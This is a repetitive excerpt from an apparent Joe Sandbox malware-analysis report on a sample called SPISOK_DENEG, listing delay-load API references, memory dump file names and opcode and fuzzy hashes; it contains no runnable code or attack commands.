                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ad7147038cbf5d21dc9c312e63cece5d1b8adc5bc94f7d03f8ddc5134520540f
                                                            • Instruction ID: 45a0d8106c46a80fe567e81ab8e99b9fb17b11097e48e79798a84290ecdeab66
                                                            • Opcode Fuzzy Hash: ad7147038cbf5d21dc9c312e63cece5d1b8adc5bc94f7d03f8ddc5134520540f
                                                            • Instruction Fuzzy Hash: 00B092B52581C4ACA14852069E02C3A011CC280B12320822AB819E0081AA8069840871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 196b8747ef9e65a167eb9c1742e0534e467e2c20eb847bd0c9c69bcfa7ba7e62
                                                            • Instruction ID: 6f1eeb6d62dc1c85ffd414db4d52edc356c18aaf1a417a6f765da02951c4e85f
                                                            • Opcode Fuzzy Hash: 196b8747ef9e65a167eb9c1742e0534e467e2c20eb847bd0c9c69bcfa7ba7e62
                                                            • Instruction Fuzzy Hash: 22B012F53580C4ACF10852079E02C3B011CC2C0F11330813EF819F00C1EE806D440C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7877904f207f2dbe9f240fa4f440ecc7fb4d2de8f7e31462d4ed3f312c0fc0d2
                                                            • Instruction ID: 1086bf66bbdad62155eaee93bdfc109679c39e7bc0938c82109c5bc1111d6998
                                                            • Opcode Fuzzy Hash: 7877904f207f2dbe9f240fa4f440ecc7fb4d2de8f7e31462d4ed3f312c0fc0d2
                                                            • Instruction Fuzzy Hash: 79B012F53580C4ACF10852079F02C3B011CC2C0F11330813EF819F00C1EE806E851C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d5bae7b11648bc9c378fd402816d36acd961480f8009ad99b277263ae2b844a7
                                                            • Instruction ID: d9da80aa22e8db0c13b9c2ead17c23a5fc7d22bd5a371a8dc1e9c596561220a8
                                                            • Opcode Fuzzy Hash: d5bae7b11648bc9c378fd402816d36acd961480f8009ad99b277263ae2b844a7
                                                            • Instruction Fuzzy Hash: ADB012F53590C4ACF10852079E02C3B010DC2C1B21730C13EFC19E00C1EE80AC440C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 124a544d965d588dc1b4e8ecec06c41000a0083cf2f0472c82021f9ed218a6c8
                                                            • Instruction ID: dc89b64b996b16245bb1a019760a687fdc9a3a2e14e0fbe559dc44c8e338feed
                                                            • Opcode Fuzzy Hash: 124a544d965d588dc1b4e8ecec06c41000a0083cf2f0472c82021f9ed218a6c8
                                                            • Instruction Fuzzy Hash: B5B012F53591C4BCF14853079E02C3B010DC2C0B22730823EF819E00C1EEC06C880C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 505643937204d49923b9c597dad2da78139de360fd9396bb348eb667faefaa3b
                                                            • Instruction ID: 546ec05f493b58c5bdde1d5c564f3677ad4f9e6ec3a31c9c41b27cafd73f2e85
                                                            • Opcode Fuzzy Hash: 505643937204d49923b9c597dad2da78139de360fd9396bb348eb667faefaa3b
                                                            • Instruction Fuzzy Hash: 49B012F53580C4ACF10852179E02C3B014CC2C1B11330C13EFC19E00C1EF80AC440C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3f60bd73e2cb53af2c6cf2a2c111c4d16895c14be148a989f4c76a8b0d20d89f
                                                            • Instruction ID: 6d7d65a68eb26578fcd061b4ea80e2ccdf16d6410b3b411317d915b27b308d5f
                                                            • Opcode Fuzzy Hash: 3f60bd73e2cb53af2c6cf2a2c111c4d16895c14be148a989f4c76a8b0d20d89f
                                                            • Instruction Fuzzy Hash: 8EB012F53690C4ACF10852079E02C3B014DC6C0B21730813EF85AE00C1EE806C440C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE1E3
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bacf7e79395b081f0472598c21d3f24c404aa169fbf9a9e64f7aadb319c7cb3c
                                                            • Instruction ID: c8b975bc5606b8222114c699b6a1466ac7e788819d0c16d442c42eab3121ff6d
                                                            • Opcode Fuzzy Hash: bacf7e79395b081f0472598c21d3f24c404aa169fbf9a9e64f7aadb319c7cb3c
                                                            • Instruction Fuzzy Hash: 8CB012F53580C4ACF10852079F02C3B018CC2C0B11730813EF819E00C1EF806D851C71
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EEAF9
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 4a1e0fb561da94a142852146e00b098f1c635e8464bfb67290d468b01eb01324
                                                            • Instruction ID: 6e19f6d2caabbd758fcf77027a723ef2140fbca65afc3e42ff56544047ead24f
                                                            • Opcode Fuzzy Hash: 4a1e0fb561da94a142852146e00b098f1c635e8464bfb67290d468b01eb01324
                                                            • Instruction Fuzzy Hash: 1BB012E639A0CA7CF11863029F42C3B010CC2C0BA0330813EF418F40C2DEC15C450872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e1b0616f1d1373885ab409880a59f6fd510b4d3cd63fa23e487c01e3426d778c
                                                            • Instruction ID: 460b2d2b82ea4be1e1d36206a85cffea67c481361fb22e3ad5274a8eaa8c6d4a
                                                            • Opcode Fuzzy Hash: e1b0616f1d1373885ab409880a59f6fd510b4d3cd63fa23e487c01e3426d778c
                                                            • Instruction Fuzzy Hash: AFB092A12580C4ACF12852169A06CBB0218C280B10330822AB518E11C19A8109490872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 027274604e17264a468ede594b4d7735b8a76fa78da63d3d70d995cfa3619837
                                                            • Instruction ID: 0c1b7b8e9ba65b203de877afe26f625bf6ea44d8f053aebae7994838bc092057
                                                            • Opcode Fuzzy Hash: 027274604e17264a468ede594b4d7735b8a76fa78da63d3d70d995cfa3619837
                                                            • Instruction Fuzzy Hash: 36B012F13580C4BCF12892169E06C7B021CC2C0F10330822EF818F11C1DE804F040C73
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE3FC
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a2e14eb07265f166b915bc4095c63fdb75fa37e978d275d865ba696b1fe0b1cc
                                                            • Instruction ID: 00d38e2f9dea98b13b8f370aba6f57983fa8f0bf77d53bb0196f0473b3f4c06e
                                                            • Opcode Fuzzy Hash: a2e14eb07265f166b915bc4095c63fdb75fa37e978d275d865ba696b1fe0b1cc
                                                            • Instruction Fuzzy Hash: 94B092A12580C4ACF12892169A06C7B0218C280B10330822AB818E11C1DA8049080872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cfe520577560b2f1e3edf02f077536bb65271945eff0bd2694fdadc7e8a86615
                                                            • Instruction ID: 87cdc6336b05242a9aa9c5af3a5816a6715049e14e6efc830b5593d9f714952e
                                                            • Opcode Fuzzy Hash: cfe520577560b2f1e3edf02f077536bb65271945eff0bd2694fdadc7e8a86615
                                                            • Instruction Fuzzy Hash: C2B012D22598C47CF11812269F06D3F010CC2C1F10B30413EF4A4F04C2AE800D080871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: ddf77b4e447e1b69276c719a85e8c0edd1a8fb600e1d70b64ae67b082197cef8
                                                            • Instruction ID: 1d69db597a4818047179b305e019c5829e8c1a16fbfb124124da8b2c28d254e4
                                                            • Opcode Fuzzy Hash: ddf77b4e447e1b69276c719a85e8c0edd1a8fb600e1d70b64ae67b082197cef8
                                                            • Instruction Fuzzy Hash: 2AB012D22598C47CF118520A9F02D3F090CC2C5F10730812EF458E41C1EE810C450871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9a36601c0f958ae20a34ba4c9a7f8d642e3b70586a97eeeb4650d5c0335209b6
                                                            • Instruction ID: 25a577c7f10625bb15f0d7921601bc83ecab9df257d3ccd9b72680862e9e1c47
                                                            • Opcode Fuzzy Hash: 9a36601c0f958ae20a34ba4c9a7f8d642e3b70586a97eeeb4650d5c0335209b6
                                                            • Instruction Fuzzy Hash: 2DB012D22599C47DF118520A9F02E3F050CC2C5F10730412EF458E41C1EE800C040871
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 000EE51F
                                                              • Part of subcall function 000EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000EE8D0
                                                              • Part of subcall function 000EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000EE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b8f7fffd76518813405466af6cc2014726287cd4f2aa9df2892f27c2f607485e
                                                            • Instruction ID: 8b1624ee2795f9b2820a69feb7e19c71de32855d2b0d3abd8c8658505b5f588c
                                                            • Opcode Fuzzy Hash: b8f7fffd76518813405466af6cc2014726287cd4f2aa9df2892f27c2f607485e
                                                            • Instruction Fuzzy Hash: 0CB012D22599C47CF218520ADE03D3F010CC2C5F11730432EF458E01C1EE800C480875
